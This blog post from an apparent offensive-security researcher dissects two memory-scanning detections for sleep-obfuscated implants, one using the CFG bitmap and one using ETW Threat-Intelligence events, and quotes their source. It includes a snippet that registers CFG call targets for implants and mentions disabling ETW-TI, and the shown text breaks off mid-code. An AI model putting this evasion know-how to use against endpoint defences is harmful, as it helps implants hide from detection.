naively bypassing new memory scanning POCs

prelude

This blogpost expands on a talk I gave at university. I went down several rabbit holes on in-memory evasion, from both an offensive and a defensive perspective. I hope it gives others more ideas, as there are many more things to uncover about this subject. More on this subject soon TM.

The technique presented here is rather primitive and, if anything, very silly; it does prove one thing though: even the more cutting-edge and scalable detections can be juked very easily.

Only by defenders and attackers working together will this field keep moving forward.


intro

Sleep obfuscation has become a core component of modern implants, allowing an implant to conceal itself at rest and thus hide some, if not most, of the in-memory IOCs that modern memory scanners hunt for (cf. Moneta and PE-Sieve).

However, in recent months, new ways to find those concealed implants were presented at BLACKHAT ASIA 2023 by John Uhlmann (aka jdu2600), a security engineer specializing in scalable Windows in-memory malware detection @ ELASTIC. It is worth noting that some of the research was uncovered by Gabriel Landau, a “WinDbg’er” @ ELASTIC.

These new ways tackle the in-memory threat detection problem by leveraging two components that already exist in the Windows operating system. Fortunately, they also address every public sleep obfuscation implementation, rendering those implementations insufficient by themselves.

you can run but you can’t hide

3 POCs were published following the talk, but only two of them are really relevant for us. I mean no offense to the one-of-a-kind work of Mr Uhlmann, Mr Landau and ELASTIC as a whole when saying this, and I first invite you to go watch the talk on youtube.com and kindly give the POCs a quick read on GitHub.

The two POCs are:

  1. CFG-FindHiddenShellcode which uses the CFG bitmap
  2. EtwTi-FluctuationMonitor which leverages the immutable page principle

ELASTIC moving crazy

What’s so special about them ? Coupled together they can detect beloved and commonly used implementations of Ekko/Zilean, FOLIAGE, Gargoyle, … pretty accurately and with minimal overhead (no “who up callin RtlCreateTimer/NtQueueApcThread ?”).

The scope of this blogpost is to prove that it is in fact possible to address those two rather new detections in a rather silly way (I will talk about a sane way but it’s not as silly >:[ ). I won’t spend too much time on how current sleep obfuscation techniques work in depth or why they matter (it’s not exactly new and I am trying to keep the blogpost concise). Instead, I recommend you watch Kyle Avery’s excellent talk on the matter if you are not up to speed already.

Unbeknownst to ELASTIC and Mr Uhlmann, I can run AND hide.

CFG-FindHiddenShellcode

The first POC that caught my attention was CFG-FindHiddenShellcode. It leverages the CFG bitmap to find previously executable regions, which comes in handy when hunting for concealed implants that, at rest, appear as ~X.

But how ? why ? and what is even the CFG ?

wat da hell is CFG

Control Flow Guard is an exploit mitigation introduced in KB3000850 (November 2014). It prevents the redirection of control flow to unexpected locations: the compiler inserts CFG instrumentation into the code, tightly restricting where indirect calls can land.

goofy CFG pseudocode

__guard_check_icall_fptr will at runtime call ntdll!LdrpValidateUserCallTarget
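What the instrumentation boils down to can be modeled in a few portable lines. This is a toy sketch, not the real ntdll logic: `g_valid_targets`, `GuardCheckICall`, `GuardedCall` and `MarkValid` are hypothetical names, a `std::set` stands in for the CFG bitmap, and the model throws where the real check would fast-fail the process.

```cpp
#include <cstdint>
#include <set>
#include <stdexcept>

using Fn = int (*)(int);

// Toy stand-in for the CFG bitmap: addresses that are valid indirect call targets.
static std::set<std::uintptr_t> g_valid_targets;

inline void MarkValid(Fn target) {
    g_valid_targets.insert(reinterpret_cast<std::uintptr_t>(target));
}

// Hypothetical equivalent of the check inserted before an indirect call.
// The real check terminates the process; the model throws so it can be observed.
inline void GuardCheckICall(Fn target) {
    if (g_valid_targets.count(reinterpret_cast<std::uintptr_t>(target)) == 0)
        throw std::runtime_error("invalid indirect call target");
}

// What an instrumented indirect call looks like conceptually.
inline int GuardedCall(Fn target, int arg) {
    GuardCheckICall(target);  // added by the compiler
    return target(arg);       // the original indirect call
}

inline int Twice(int x)  { return 2 * x; }
inline int Thrice(int x) { return 3 * x; }
```

Calling `GuardedCall(Twice, 21)` after `MarkValid(Twice)` goes through, while `GuardedCall(Thrice, 1)` is rejected because `Thrice` was never marked.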

CFG is known to be a pain for sleep obfuscation because most techniques (EKKO/ZILEAN/FOLIAGE/…) perform indirect calls through NtContinue, and it can be a pain in general, even in legit (but usually old or lazy) software. It is therefore possible to add exceptions/valid targets so your process doesn’t blow up, as shown here:

// credits @C5pider (havoc)

/*!
 * @brief
 *  add module + function to CFG exception list.
 *
 * @param ImageBase
 * @param Function
 */
VOID CfgAddressAdd(
    IN PVOID ImageBase,
    IN PVOID Function
) {
    CFG_CALL_TARGET_INFO Cfg      = { 0 };
    MEMORY_RANGE_ENTRY   MemRange = { 0 };
    VM_INFORMATION       VmInfo   = { 0 };
    PIMAGE_NT_HEADERS    NtHeader = { 0 };
    ULONG                Output   = 0;
    NTSTATUS             NtStatus = STATUS_SUCCESS;

    NtHeader                = C_PTR( ImageBase + ( ( PIMAGE_DOS_HEADER ) ImageBase )->e_lfanew );
    MemRange.NumberOfBytes  = U_PTR( NtHeader->OptionalHeader.SizeOfImage + 0x1000 - 1 ) &~( 0x1000 - 1 );
    MemRange.VirtualAddress = ImageBase;

    /* set cfg target call info */
    Cfg.Flags  = CFG_CALL_TARGET_VALID;
    Cfg.Offset = Function - ImageBase;

    VmInfo.dwNumberOfOffsets = 1;
    VmInfo.plOutput          = &Output;
    VmInfo.ptOffsets         = &Cfg;
    VmInfo.pMustBeZero       = FALSE;
    VmInfo.pMoarZero         = FALSE;

    if ( ! NT_SUCCESS( NtStatus = SysNtSetInformationVirtualMemory( NtCurrentProcess(), VmCfgCallTargetInformation, 1, &MemRange, &VmInfo, sizeof( VmInfo ) ) ) ) {
        PRINTF( "NtSetInformationVirtualMemory Failed => 0x%lx", NtStatus );
    }
}

You would normally use the “SetProcessValidCallTargets” API; however, I wanted to show this snippet for a more detailed view of how this is achieved. It might also sound counterintuitive that you can just add a valid indirect call target at will. However, for shellcode to add itself as a valid indirect call target, it would already need code execution, which means it would somehow already have to be a valid target. In layman’s terms, this is a typical chicken-and-egg problem.
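The only arithmetic in that snippet is the page rounding of the image size and the offset of the function inside the image. A portable sketch of both follows; `AlignUpToPage` and `TargetOffset` are hypothetical helper names, and the 0x1000 page size is taken from the snippet.

```cpp
#include <cstdint>

constexpr std::uint64_t kPageSize = 0x1000;

// Round a size up to the next multiple of the page size
// (same bit trick as the MemRange.NumberOfBytes line).
constexpr std::uint64_t AlignUpToPage(std::uint64_t size) {
    return (size + kPageSize - 1) & ~(kPageSize - 1);
}

// Offset of a function relative to its image base, as computed for Cfg.Offset.
constexpr std::uint64_t TargetOffset(std::uint64_t image_base, std::uint64_t function) {
    return function - image_base;
}

static_assert(AlignUpToPage(0x1234) == 0x2000, "partial pages round up");
static_assert(AlignUpToPage(0x2000) == 0x2000, "aligned sizes are unchanged");
```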

This way, additional memory ranges can be marked as valid in the eyes of CFG. But how does it keep track of those ?

bits and maps

CFG uses a bitmap to keep track of valid targets, where a set bit indicates that the address is a valid indirect call target. This bitmap is mapped into CFG-enabled processes when they are created. Once it is mapped, the OS stores its address at ntdll!LdrSystemDllInitBlock + 0x60 and its size at ntdll!LdrSystemDllInitBlock + 0x68. Before an indirect call, ntdll!LdrpValidateUserCallTarget is called to verify the target address at runtime.

It is worth noting that the CFG bitmap is PAGE_READONLY and that trying to tamper with it directly would be a very poor way to go about things.

ntdll!LdrpValidateUserCallTarget (called by __guard_check_icall_fptr in our CFG instrumented binary) tests a bit of the CFG bitmap that corresponds to the target address.

As explained by Zhang Yunhai the following is how the bitmap is tested:

-  Extract the highest 24 bits of the target address to form an index
-  Fetch a 32-bit DWORD from the CFG Bitmap using the index
-  Extract the 4th to 8th bits of the target address to form an offset n
-  Set the lowest bit of offset n if the target address is not 0x10 aligned
-  Test the nth bit of the 32-bit DWORD
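The steps above can be sketched as follows. This models the 32-bit layout the list describes, not the x64 one, and it is a toy: `ToyCfgBitmap`, `CfgBitOffset`, `IsValidCallTarget` and `MarkValidCallTarget` are hypothetical names, a sparse map replaces the real bitmap, and "4th to 8th bits" is read as counting from 1 (bits 3 to 7 when counting from 0), which is an assumption.

```cpp
#include <cstdint>
#include <unordered_map>

// Sparse toy bitmap: index -> 32-bit entry. Missing entries read as zero.
using ToyCfgBitmap = std::unordered_map<std::uint32_t, std::uint32_t>;

// Bit position inside the 32-bit entry for a given target address.
inline std::uint32_t CfgBitOffset(std::uint32_t target) {
    std::uint32_t n = (target >> 3) & 0x1F;  // 4th to 8th bits of the address
    if (target & 0xF) n |= 1;                // not 0x10-aligned: use the odd bit
    return n;
}

inline bool IsValidCallTarget(const ToyCfgBitmap& bitmap, std::uint32_t target) {
    const std::uint32_t index = target >> 8;  // highest 24 bits
    const auto it = bitmap.find(index);
    const std::uint32_t entry = (it == bitmap.end()) ? 0u : it->second;
    return ((entry >> CfgBitOffset(target)) & 1u) != 0;
}

// Helper for the model only: mark one address as a valid target.
inline void MarkValidCallTarget(ToyCfgBitmap& bitmap, std::uint32_t target) {
    bitmap[target >> 8] |= (1u << CfgBitOffset(target));
}
```

Marking 0x00401230 as valid sets an even bit; an unaligned address in the same 16-byte slot, such as 0x00401234, maps to the neighbouring odd bit and therefore stays invalid.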

If the bit isn’t set, then the target address is invalid. In this case, ntdll!RtlpHandleInvalidUserCallTarget is called, which raises interrupt 0x29 (__fastfail) unless specific conditions are met.

where ?

The pointer to this bitmap is stored in PS_SYSTEM_DLL_INIT_BLOCK.CfgBitMap; however, the way the POC fetches it works around the fact that the structure itself is not documented and that the offset has changed in the past:

PVOID GetCfgBitmapPointer()
{
    PVOID pCfgBitmap = NULL;

    // PS_SYSTEM_DLL_INIT_BLOCK is exported from ntdll as LdrSystemDllInitBlock, but the structure itself is not documented
    // and the offset has changed previously.
    // We could hardcode offsets, or bruteforce this block looking for a pointer that matches the expected 2TB MEM_MAPPED
    // region characteristics.
    // However, the first instruction of LdrControlFlowGuardEnforced is usually -
    //   48 83 xx xx xx xx 00 00  cmp PS_SYSTEM_DLL_INIT_BLOCK.CfgBitMap, 0
    // So we can calculate the absolute address from the rel32 offset in this instruction.
    PVOID pLdrControlFlowGuardEnforced = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrControlFlowGuardEnforced");
    if (!pLdrControlFlowGuardEnforced)
        return NULL;

    PUCHAR Rip = (PUCHAR)pLdrControlFlowGuardEnforced + 8;
    PDWORD pRipRelativeOffset = (PDWORD)((PUCHAR)pLdrControlFlowGuardEnforced + 3);
    DWORD RipRelativeOffset = 0;
    SIZE_T szBytesRead = 0;
    if (!ReadProcessMemory(GetCurrentProcess(), pRipRelativeOffset, &RipRelativeOffset, sizeof(RipRelativeOffset), &szBytesRead))
        return NULL;

    return Rip + RipRelativeOffset;
}
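The address computation in that function is plain RIP-relative resolution: the target is the address of the next instruction plus the rel32 displacement. Here is a portable sketch over a raw byte buffer; `ResolveRipRelative` is a hypothetical helper, a little-endian host is assumed, and the displacement is read as a signed 32-bit value (the POC stores it in a DWORD, which gives the same result as long as the displacement is positive).

```cpp
#include <cstdint>
#include <cstring>

// Resolve the absolute address referenced by a RIP-relative instruction.
//   insn_addr   : address the instruction is loaded at
//   bytes       : raw instruction bytes
//   disp_offset : where the rel32 displacement starts inside the instruction
//   insn_length : total instruction length (RIP points past the instruction)
inline std::uint64_t ResolveRipRelative(std::uint64_t insn_addr,
                                        const std::uint8_t* bytes,
                                        std::size_t disp_offset,
                                        std::size_t insn_length) {
    std::int32_t rel32 = 0;  // the displacement is signed
    std::memcpy(&rel32, bytes + disp_offset, sizeof(rel32));
    // Adding the sign-extended displacement wraps correctly for negative values.
    return insn_addr + insn_length + static_cast<std::uint64_t>(static_cast<std::int64_t>(rel32));
}
```

With the POC's layout (displacement at byte 3, 8-byte instruction), an instruction at 0x1000 carrying a displacement of 0x10 resolves to 0x1018.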

The author can read the memory of our own process here because of how ASLR and known DLLs (which use COW) behave. PS_SYSTEM_DLL_INIT_BLOCK.CfgBitMap lives in ntdll.dll, which is a known DLL, so the pointer to the CFG bitmap lives at the same address in every usermode process. Getting the pointer’s address in our process or in a remote one therefore doesn’t really matter; what matters is which address space we’re querying.

bitmap behavior

By default, *Protect and *Alloc functions treat a specified region of PAGE_EXECUTE + MEM_COMMIT pages as valid indirect call targets, which in turn updates the bitmap. It is possible to override this behavior by specifying PAGE_TARGETS_INVALID when calling *Alloc functions, or PAGE_TARGETS_NO_UPDATE when calling *Protect functions (when changing the protection to *X).

/*
EXTRACT OF [https://learn.microsoft.com/en-us/windows/win32/memory/memory-protection-constants]


Constants > PAGE_TARGETS_NO_UPDATE

[...] The default behavior for VirtualProtect protection change to executable is to mark all locations as valid call targets for CFG.


Constants > PAGE_TARGETS_INVALID

Sets all locations in the pages as invalid targets for CFG. Used along with any execute page protection like PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE and PAGE_EXECUTE_WRITECOPY. 
Any indirect call to locations in those pages will fail CFG checks and the process will be terminated. 
The default behavior for executable pages allocated is to be marked valid call targets for CFG.
*/

The reason for this default behavior, and the reason private executable memory is a thing at all, is JIT, which we will talk about later on.

This means that when a committed memory region has its protection changed to X, the CFG bitmap will by default record the region as a valid indirect call target (unless told otherwise, as described above). However, the bitmap WILL NOT be updated when the protection is toggled to ~X: once a region is marked as a valid indirect call target, the mark remains no matter what its next protections are; see where we going ??

the blessed side-effect

Now that we know how the bitmap acts, the following can be established:

“The CFG bitmap, as an unintended side-effect, will record the location of every private memory region that are or were previously executable during the lifetime of the process”

This is actually a very powerful side-effect: since a beacon at rest appears as ~X when performing sleep obfuscation, the bitmap makes it possible to tell that it was previously executable, which makes concealed beacons stand out in most host processes.

This “side-effect” is what CFG-FindHiddenShellcode harnesses to uncover “hidden” pages (pages that were previously executable but now aren’t). Chained into a detection pipeline, it would certainly help triage processes worth scanning. It is also cheap enough performance-wise.
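The sticky behavior is easy to model. The sketch below is a toy, not the kernel's bookkeeping: `ToyProcess`, `Prot` and `IsHidden` are hypothetical names, protections are reduced to an enum, and a set of page addresses stands in for the CFG bitmap.

```cpp
#include <cstdint>
#include <map>
#include <set>

enum class Prot { NoAccess, ReadOnly, ReadWrite, ExecuteRead };

inline bool IsExec(Prot p) { return p == Prot::ExecuteRead; }

// Toy process: current protection per page, plus a CFG-like record
// that is only ever added to.
struct ToyProcess {
    std::map<std::uint64_t, Prot> pages;  // page base -> current protection
    std::set<std::uint64_t> cfg_marked;   // pages ever marked as valid targets

    void Protect(std::uint64_t page, Prot p) {
        pages[page] = p;
        if (IsExec(p))
            cfg_marked.insert(page);      // set when the page becomes X ...
        // ... and deliberately not cleared when it goes back to ~X
    }

    // "Hidden" as used here: marked in the bitmap, but not executable right now.
    bool IsHidden(std::uint64_t page) const {
        const auto it = pages.find(page);
        return it != pages.end() && !IsExec(it->second) && cfg_marked.count(page) != 0;
    }
};
```

A page that goes RW, then RX, then back to RW ends up hidden in this model, while a page that was only ever RW does not.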

We can see the CFG bitmap being used to find hidden pages in the main source file. As said previously, the pointer lives at the same location in every process; however, we only care about reading what it points to in the relevant processes.

PULONG_PTR GetCfgBitmap(HANDLE hProcess)
{
    static PVOID ppCfgBitmap = GetCfgBitmapPointer();
    PULONG_PTR pCfgBitmap = NULL;
    MEMORY_BASIC_INFORMATION mbi{};
    SIZE_T szBytesRead = 0;
    if (!ppCfgBitmap ||
        !ReadProcessMemory(hProcess, ppCfgBitmap, &pCfgBitmap, sizeof(pCfgBitmap), &szBytesRead) ||
        (0 == pCfgBitmap) ||
        !VirtualQueryEx(hProcess, pCfgBitmap, &mbi, sizeof(mbi)))
    {
        return NULL;
    }

    // Quick sanity check that our CFG bitmap pointer is the base of a MEM_MAPPED allocation.
    // We could also validate that it is 2TB in size.
    if ((mbi.AllocationBase != pCfgBitmap) || (MEM_MAPPED != mbi.Type))
    {
        printf("%p PS_SYSTEM_DLL_INIT_BLOCK.CfgBitMap = %p is invalid\n", ppCfgBitmap, pCfgBitmap);
        pCfgBitmap = NULL;
    }

    return pCfgBitmap;
}

Once the CFG bitmap of a process of interest is retrieved, the author queries its address space in search of MEM_COMMIT pages and, when such pages are found, queries the bitmap with an index shift of 9:

            ULONG_PTR vaRegionEnd = va + mbiCfg.RegionSize * 64;
            while (va < vaRegionEnd)
            {
                pCfgEntry = pCfgBitMap + ((ULONG_PTR)va >> CFG_INDEX_SHIFT);
                SIZE_T stBytesRead = 0;
                ULONG_PTR ulEntry = 0;
                // TODO(jdu) This per-entry read is inefficient - just read the whole region upfront instead.
                if (!ReadProcessMemory(hProcess, pCfgEntry, &ulEntry, sizeof(ulEntry), &stBytesRead))
                    break;

Each CFG bitmap page corresponds to 64 VA pages.
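The factor of 64 falls out of the index shift and the entry size. A quick sketch of the arithmetic, assuming 8-byte bitmap entries (the POC indexes a `PULONG_PTR`) and 4K pages; the constant and function names are mine:

```cpp
#include <cstdint>

constexpr std::uint64_t kCfgIndexShift = 9;       // index shift used by the POC
constexpr std::uint64_t kEntrySize     = 8;       // sizeof(ULONG_PTR) on x64
constexpr std::uint64_t kPage          = 0x1000;  // 4K pages

// Index of the bitmap entry that describes a virtual address.
constexpr std::uint64_t CfgEntryIndex(std::uint64_t va) { return va >> kCfgIndexShift; }

// Each entry describes 512 bytes of address space ...
constexpr std::uint64_t kVaBytesPerEntry = 1ull << kCfgIndexShift;
// ... a bitmap page holds 512 entries ...
constexpr std::uint64_t kEntriesPerBitmapPage = kPage / kEntrySize;
// ... so one bitmap page describes 512 * 512 bytes = 64 pages.
constexpr std::uint64_t kVaPagesPerBitmapPage =
    kEntriesPerBitmapPage * kVaBytesPerEntry / kPage;

static_assert(kVaPagesPerBitmapPage == 64, "one bitmap page describes 64 VA pages");
```

The same ratio is consistent with the 2TB mapping mentioned in the POC comments if the bitmap covers a 128TB user address space (128TB / 64 = 2TB).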

The main detection mechanism comes a bit later in the code:

                if ((hiddenRegionSize > 0) && ((MAXULONG_PTR != ulEntry) || (va == vaRegionEnd)))
                {
                    // The CFG bitmap indicates that this region has been executable during the lifetime
                    // of the process. Now check the VAD tree.

                    MEMORY_BASIC_INFORMATION mbiStart{};
                    MEMORY_BASIC_INFORMATION mbiEnd{};
                    if (VirtualQueryEx(hProcess, (PVOID)hiddenRegionStart, &mbiStart, sizeof(mbi)) &&
                        (MEM_COMMIT == mbiStart.State) &&
                        VirtualQueryEx(hProcess, (PVOID)(hiddenRegionStart + hiddenRegionSize - 1), &mbiEnd, sizeof(mbi)))
                    {
                        // Is this region non-executable in the VAD tree?
                        bool bHiddenRegion = !(PAGE_EXECUTE_FLAGS & mbiStart.Protect) &&
                            !(PAGE_EXECUTE_FLAGS & mbiStart.AllocationProtect);

                        // Handle a few common (likely) false positives.
                        bool bLikelyFalsePositive = 
                            (mbiStart.AllocationBase != mbiEnd.AllocationBase) || // hidden region overlaps allocation
                            (hiddenRegionSize == 0x3000);                         // 12K region
                        
                        if (bHiddenRegion && (bAggressive || !bLikelyFalsePositive))
                        {
                            result.push_back((PVOID)(hiddenRegionStart));
                        }
                    }

                    hiddenRegionStart = 0;
                    hiddenRegionSize = 0;
                }

Since the CFG bitmap indicates that the region has been executable at some point, the author queries the region of interest. If, according to the VAD (Virtual Address Descriptor) tree, the region isn’t executable, as captured by the bHiddenRegion bool:

constexpr auto PAGE_EXECUTE_FLAGS = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY;
[...]
                        // Is this region non-executable in the VAD tree?
                        bool bHiddenRegion = !(PAGE_EXECUTE_FLAGS & mbiStart.Protect) &&
                            !(PAGE_EXECUTE_FLAGS & mbiStart.AllocationProtect);

Then the region is considered “hidden”: although the CFG bitmap clearly states that said region was previously executable, it now isn’t. The hidden region is thus saved to our results vector.

                        if (bHiddenRegion && (bAggressive || !bLikelyFalsePositive))
                        {
                            result.push_back((PVOID)(hiddenRegionStart));
                        }

It’s worth noting that jdu2600 still makes sure to account for false positives:

                        // Handle a few common (likely) false positives.
                        bool bLikelyFalsePositive = 
                            (mbiStart.AllocationBase != mbiEnd.AllocationBase) || // hidden region overlaps allocation
                            (hiddenRegionSize == 0x3000);                         // 12K region
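Put together, the reporting decision is a small pure function. The sketch below restates it without Windows headers so it can be exercised in isolation: the protection constants are the documented Windows values, while `RegionInfo` (a cut-down stand-in for MEMORY_BASIC_INFORMATION) and `ShouldReport` are hypothetical names.

```cpp
#include <cstdint>

// Documented Windows memory protection constants, redefined for portability.
constexpr std::uint32_t kPageReadWrite        = 0x04;
constexpr std::uint32_t kPageExecute          = 0x10;
constexpr std::uint32_t kPageExecuteRead      = 0x20;
constexpr std::uint32_t kPageExecuteReadWrite = 0x40;
constexpr std::uint32_t kPageExecuteWriteCopy = 0x80;
constexpr std::uint32_t kPageExecuteFlags =
    kPageExecute | kPageExecuteRead | kPageExecuteReadWrite | kPageExecuteWriteCopy;

// Hypothetical subset of MEMORY_BASIC_INFORMATION.
struct RegionInfo {
    std::uint64_t allocation_base;
    std::uint32_t protect;
    std::uint32_t allocation_protect;
};

// Mirrors the bHiddenRegion / bLikelyFalsePositive / bAggressive logic.
inline bool ShouldReport(const RegionInfo& start, const RegionInfo& end,
                         std::uint64_t hidden_size, bool aggressive) {
    const bool hidden = !(kPageExecuteFlags & start.protect) &&
                        !(kPageExecuteFlags & start.allocation_protect);
    const bool likely_false_positive =
        (start.allocation_base != end.allocation_base) ||  // spans two allocations
        (hidden_size == 0x3000);                           // 12K region
    return hidden && (aggressive || !likely_false_positive);
}
```

Note that a region allocated as executable is never reported, even in aggressive mode, because AllocationProtect is checked alongside the current protection.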

This logic is repeated for every VA in the process (whilst still making sure we don’t go past vaRegionEnd):

va += mbiCfg.RegionSize * 64; // Each CFG BitMap page corresponds to 64 VA pages

This is an efficient, low-overhead, scalable and pretty sneaky detection.

EtwTi-FluctuationMonitor

This is the second POC that caught my attention and it’s, in my silly opinion, the nastiest of the two because it goes to show how OP ETW-TI is as a technology for defenders.

I should mention that you could remove the talking stick privilege from ETW-TI on Windows 10 and some versions of Windows 11 (see etw-bye.cpp).

the immutable page principle

This section will be extremely short because it’s something that just makes sense if you think about it

As said by jdu2600:

It is security best practice that once a page is marked executable it should be immutable. That is, the memory protection progression for code pages should only be RW to RX.

TL;DR: non-executable memory made executable shouldn’t change beyond that point, apart from being freed; the same applies to writable memory made non-writable.

what about JIT

Private memory being made executable and then executed is not in itself a sign of something suspicious going on, as that’s how JIT behaves. However, JIT (just-in-time) compilers, just like AOT (ahead-of-time) compilers, only compile once.

It’s important to note that some JIT engines reuse allocations (I think .NET reuses them ?) and there is also legitimate API hooking to account for (for instance Discord will inject a hook to record your screen when you’re streaming)

As explained in the POC itself, fluctuation is still wildly different from JIT/AOT

// The set of all of the code pages in a process that have transitions from writable to non-writable, 
// or from executable to non-executable. In both cases, these code pages should never be modified again.
// Proper JIT: Allocate(RW) -> memcpy(code) -> Protect(RX) -> execute [-> Free]
// YOLO JIT: Allocate(RWX) -> memcpy(code) -> execute
// Bad JIT: Allocate(RW) -> memcpy(code) -> Protect(RX) -> execute -> Protect(RW) -> re-use for new code
// Fluctuation: ... -> Protect(RX) -> execute -> Protect(~X) [-> encrypt] -> Protect(RX) -> ...

ETW who ?

ETW-TI is a kernel-mode technology that generates events upon security-critical operations, including, but not limited to, executable memory creation and memory protection changes.

This event feed, produced by EtwTi* functions embedded in the relevant kernel functions, can only be consumed by security products, which need to run protected (PROTECTED_ANTIMALWARE_LIGHT) and are thus required to be signed as such by Microsoft.

A list of all the events (at least on my system) can be found below

# logman query providers Microsoft-Windows-Threat-Intelligence

Provider                                 GUID
-------------------------------------------------------------------------------
Microsoft-Windows-Threat-Intelligence    {F4E1897C-BB5D-5668-F1D8-040F4D8DD344}

Value               Keyword              Description
-------------------------------------------------------------------------------
0x0000000000000001  KERNEL_THREATINT_KEYWORD_ALLOCVM_LOCAL
0x0000000000000002  KERNEL_THREATINT_KEYWORD_ALLOCVM_LOCAL_KERNEL_CALLER
0x0000000000000004  KERNEL_THREATINT_KEYWORD_ALLOCVM_REMOTE
0x0000000000000008  KERNEL_THREATINT_KEYWORD_ALLOCVM_REMOTE_KERNEL_CALLER
0x0000000000000010  KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL
0x0000000000000020  KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL_KERNEL_CALLER
0x0000000000000040  KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE
0x0000000000000080  KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE_KERNEL_CALLER
0x0000000000000100  KERNEL_THREATINT_KEYWORD_MAPVIEW_LOCAL
0x0000000000000200  KERNEL_THREATINT_KEYWORD_MAPVIEW_LOCAL_KERNEL_CALLER
0x0000000000000400  KERNEL_THREATINT_KEYWORD_MAPVIEW_REMOTE
0x0000000000000800  KERNEL_THREATINT_KEYWORD_MAPVIEW_REMOTE_KERNEL_CALLER
0x0000000000001000  KERNEL_THREATINT_KEYWORD_QUEUEUSERAPC_REMOTE
0x0000000000002000  KERNEL_THREATINT_KEYWORD_QUEUEUSERAPC_REMOTE_KERNEL_CALLER
0x0000000000004000  KERNEL_THREATINT_KEYWORD_SETTHREADCONTEXT_REMOTE
0x0000000000008000  KERNEL_THREATINT_KEYWORD_SETTHREADCONTEXT_REMOTE_KERNEL_CALLER
0x0000000000010000  KERNEL_THREATINT_KEYWORD_READVM_LOCAL
0x0000000000020000  KERNEL_THREATINT_KEYWORD_READVM_REMOTE
0x0000000000040000  KERNEL_THREATINT_KEYWORD_WRITEVM_LOCAL
0x0000000000080000  KERNEL_THREATINT_KEYWORD_WRITEVM_REMOTE
0x0000000000100000  KERNEL_THREATINT_KEYWORD_SUSPEND_THREAD
0x0000000000200000  KERNEL_THREATINT_KEYWORD_RESUME_THREAD
0x0000000000400000  KERNEL_THREATINT_KEYWORD_SUSPEND_PROCESS
0x0000000000800000  KERNEL_THREATINT_KEYWORD_RESUME_PROCESS
0x0000000001000000  KERNEL_THREATINT_KEYWORD_FREEZE_PROCESS
0x0000000002000000  KERNEL_THREATINT_KEYWORD_THAW_PROCESS
0x0000000004000000  KERNEL_THREATINT_KEYWORD_CONTEXT_PARSE
0x0000000008000000  KERNEL_THREATINT_KEYWORD_EXECUTION_ADDRESS_VAD_PROBE
0x0000000010000000  KERNEL_THREATINT_KEYWORD_EXECUTION_ADDRESS_MMF_NAME_PROBE
0x0000000020000000  KERNEL_THREATINT_KEYWORD_READWRITEVM_NO_SIGNATURE_RESTRICTION
0x0000000040000000  KERNEL_THREATINT_KEYWORD_DRIVER_EVENTS
0x0000000080000000  KERNEL_THREATINT_KEYWORD_DEVICE_EVENTS
0x0000000100000000  KERNEL_THREATINT_KEYWORD_READVM_REMOTE_FILL_VAD
0x0000000200000000  KERNEL_THREATINT_KEYWORD_WRITEVM_REMOTE_FILL_VAD
0x0000000400000000  KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL_FILL_VAD
0x0000000800000000  KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL_KERNEL_CALLER_FILL_VAD
0x0000001000000000  KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE_FILL_VAD
0x0000002000000000  KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE_KERNEL_CALLER_FILL_VAD
0x8000000000000000  Microsoft-Windows-Threat-Intelligence/Analytic

Value               Level                Description
-------------------------------------------------------------------------------
0x04                win:Informational    Information

PID                 Image
-------------------------------------------------------------------------------
0x00000000

In the case of EtwTi-FluctuationMonitor the event being leveraged is KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL as seen in the first lines of the POC

int wmain(int, wchar_t**) {
    printf("[*] Enabling Microsoft-Windows-Threat-Intelligence (KEYWORD_PROTECTVM_LOCAL)\n");
    krabs::provider<> ti_provider(L"Microsoft-Windows-Threat-Intelligence");
    ti_provider.any(0x10); // KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL

    krabs::event_filter protectvm_filter(krabs::predicates::id_is(7));

This event is emitted when a *Protect function is called and carries information about the call, such as the calling process ID, the base address, and the new and previous protection masks.

That information is then parsed:

 auto protectvm_cb = [](const EVENT_RECORD& record, const krabs::trace_context& trace_context) {
        krabs::schema schema(record, trace_context.schema_locator);
        krabs::parser parser(schema);
        
        auto ProcessID          = parser.parse<DWORD>(L"CallingProcessId");
        auto BaseAddress        = parser.parse<PVOID>(L"BaseAddress");
        auto ProtectionMask     = parser.parse<DWORD>(L"ProtectionMask");
        auto LastProtectionMask = parser.parse<DWORD>(L"LastProtectionMask");

Then using ProtectionMask and LastProtectionMask we can see the implementation of the immutable page principle in action.

if ((!IsExecutable(LastProtectionMask) && IsExecutable(ProtectionMask)) ||
            (IsWritable(LastProtectionMask) && !IsWritable(ProtectionMask)))

Once a writable page is made non-writable, or a non-executable page is made executable, said page is recorded as now being immutable.

 g_ImmutableCodePages[ProcessID].insert(BaseAddress);

However if the page already was immutable then an alert is raised

            auto immutable_iter = g_ImmutableCodePages.find(ProcessID);
            if (immutable_iter != g_ImmutableCodePages.cend() &&
                immutable_iter->second.find(BaseAddress) != immutable_iter->second.cend())
            {
                // An immutable code page has been potentially modified.

                CONSOLE_SCREEN_BUFFER_INFO console_info{};
                static auto hStdOutput = GetStdHandle(STD_OUTPUT_HANDLE);
                GetConsoleScreenBufferInfo(hStdOutput, &console_info);
                SetConsoleTextAttribute(hStdOutput, RED);
                printf("[!] %S %p is fluctuating\n", ProcessName(ProcessID).c_str(), BaseAddress);
                SetConsoleTextAttribute(hStdOutput, console_info.wAttributes);
            }

Since it’s a POC, it just gives a nice, although a bit scary, warning, but this could be used to alert on, or triage, processes worth investigating further.
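The whole detection fits in a small state machine, sketched below without krabs or ETW so it can be exercised on its own. Several things here are assumptions: the bodies of `IsExecutable` and `IsWritable` (only their names appear in the POC excerpt), the `FluctuationModel` class itself, and the idea that the alert is only checked on the same transitions that record a page. That last assumption matches the observation further down that a lone RX to RW flip does not trigger the monitor.

```cpp
#include <cstdint>
#include <map>
#include <set>

// Documented Windows protection constants, redefined for portability.
constexpr std::uint32_t kReadWrite = 0x04, kWriteCopy = 0x08;
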